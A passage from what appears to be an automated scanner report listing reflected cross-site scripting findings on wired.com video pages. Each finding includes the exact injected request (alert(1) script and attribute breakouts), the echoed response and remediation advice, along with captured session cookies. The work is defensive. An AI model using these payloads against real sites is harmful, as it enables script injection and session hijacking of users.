Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:58:53 GMT
Date: Mon, 22 Nov 2010 00:53:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_behind-the-scenes-of-harry-potter-and-the-deathly-hallows c_6508758570014e069"><a>59655ba9969">
...[SNIP]...

1.877. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-with-jj-abrams/20039390001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 733e5"><a>6aeef5d110a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video733e5"><a>6aeef5d110a/behind-the-scenes-with-jj-abrams/20039390001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29418
Vary: Accept-Encoding
Cache-Control: max-age=271
Expires: Mon, 22 Nov 2010 00:55:29 GMT
Date: Mon, 22 Nov 2010 00:50:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video733e5"><a>6aeef5d110a ss_behind-the-scenes-with-jj-abrams c_20039390001">
...[SNIP]...

1.878. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-with-jj-abrams/20039390001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 5c545--><script>alert(1)</script>65965458990 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video5c545--><script>alert(1)</script>65965458990/behind-the-scenes-with-jj-abrams/20039390001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29452
Vary: Accept-Encoding
Cache-Control: max-age=285
Expires: Mon, 22 Nov 2010 00:56:23 GMT
Date: Mon, 22 Nov 2010 00:51:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video5c545--><script>alert(1)</script>65965458990/behind-the-scenes-with-jj-abrams/20039390001
-->
...[SNIP]...

1.879. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-with-jj-abrams/20039390001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb8f3"><a>39cc80102e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/behind-the-scenes-with-jj-abramscb8f3"><a>39cc80102e6/20039390001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=283
Expires: Mon, 22 Nov 2010 00:56:25 GMT
Date: Mon, 22 Nov 2010 00:51:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106758


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_behind-the-scenes-with-jj-abramscb8f3"><a>39cc80102e6 c_20039390001">
...[SNIP]...

1.880. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-with-jj-abrams/20039390001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bead8"-alert(1)-"fa9b5494e92 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/behind-the-scenes-with-jj-abramsbead8"-alert(1)-"fa9b5494e92/20039390001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=281
Expires: Mon, 22 Nov 2010 00:57:36 GMT
Date: Mon, 22 Nov 2010 00:52:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106772


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "behind-the-scenes-with-jj-abramsbead8"-alert(1)-"fa9b5494e92","20039390001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.881. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-with-jj-abrams/20039390001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a135"><a>2745aaf740 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/behind-the-scenes-with-jj-abrams/200393900019a135"><a>2745aaf740 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=296
Expires: Mon, 22 Nov 2010 00:57:55 GMT
Date: Mon, 22 Nov 2010 00:52:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106756


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_behind-the-scenes-with-jj-abrams c_200393900019a135"><a>2745aaf740">
...[SNIP]...

1.882. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-with-jj-abrams/20039390001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53cca"-alert(1)-"49da715f4a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/behind-the-scenes-with-jj-abrams/2003939000153cca"-alert(1)-"49da715f4a HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:59:02 GMT
Date: Mon, 22 Nov 2010 00:54:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106770


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "2003939000153cca"-alert(1)-"49da715f4a","behind-the-scenes-with-jj-abrams","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.883. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/calibrate-the-blues-away/4569448001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload d3d6f--><script>alert(1)</script>e2bf1c5c8cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videod3d6f--><script>alert(1)</script>e2bf1c5c8cd/calibrate-the-blues-away/4569448001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29435
Vary: Accept-Encoding
Cache-Control: max-age=279
Expires: Mon, 22 Nov 2010 00:57:57 GMT
Date: Mon, 22 Nov 2010 00:53:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videod3d6f--><script>alert(1)</script>e2bf1c5c8cd/calibrate-the-blues-away/4569448001
-->
...[SNIP]...

1.884. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/calibrate-the-blues-away/4569448001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ee46"><a>33fa741b98d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video4ee46"><a>33fa741b98d/calibrate-the-blues-away/4569448001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29400
Vary: Accept-Encoding
Cache-Control: max-age=287
Expires: Mon, 22 Nov 2010 00:57:04 GMT
Date: Mon, 22 Nov 2010 00:52:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video4ee46"><a>33fa741b98d ss_calibrate-the-blues-away c_4569448001">
...[SNIP]...

1.885. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/calibrate-the-blues-away/4569448001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84bfb"><a>7582fbe354d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/calibrate-the-blues-away84bfb"><a>7582fbe354d/4569448001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:58:21 GMT
Date: Mon, 22 Nov 2010 00:53:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106733


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_calibrate-the-blues-away84bfb"><a>7582fbe354d c_4569448001">
...[SNIP]...

1.886. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/calibrate-the-blues-away/4569448001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37678"-alert(1)-"f1e2422602e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/calibrate-the-blues-away37678"-alert(1)-"f1e2422602e/4569448001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:59:17 GMT
Date: Mon, 22 Nov 2010 00:54:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106744


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "4569448001","calibrate-the-blues-away37678"-alert(1)-"f1e2422602e","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.887. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/calibrate-the-blues-away/4569448001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b20eb"><a>219a2b9005f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/calibrate-the-blues-away/4569448001b20eb"><a>219a2b9005f HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=295
Expires: Mon, 22 Nov 2010 00:59:29 GMT
Date: Mon, 22 Nov 2010 00:54:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106740


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_calibrate-the-blues-away c_4569448001b20eb"><a>219a2b9005f">
...[SNIP]...

1.888. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/calibrate-the-blues-away/4569448001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bba80"-alert(1)-"91f95a021a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/calibrate-the-blues-away/4569448001bba80"-alert(1)-"91f95a021a9 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=287
Expires: Mon, 22 Nov 2010 00:59:59 GMT
Date: Mon, 22 Nov 2010 00:55:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106744


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "4569448001bba80"-alert(1)-"91f95a021a9","calibrate-the-blues-away","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.889. http://www.wired.com/video/culture [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/culture

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a10f"><a>9f9a6b9c5f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video5a10f"><a>9f9a6b9c5f4/culture HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29255
Vary: Accept-Encoding
Cache-Control: max-age=290
Expires: Mon, 22 Nov 2010 00:52:16 GMT
Date: Mon, 22 Nov 2010 00:47:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video5a10f"><a>9f9a6b9c5f4 ss_culture">
...[SNIP]...

1.890. http://www.wired.com/video/culture [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/culture

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d97c"><a>59487338fe7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/culture7d97c"><a>59487338fe7 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:53:52 GMT
Date: Mon, 22 Nov 2010 00:48:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106700


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_culture7d97c"><a>59487338fe7">
...[SNIP]...

1.891. http://www.wired.com/video/culture [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/culture

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2fd0d"-alert(1)-"6f7deddbb2f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/culture2fd0d"-alert(1)-"6f7deddbb2f HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
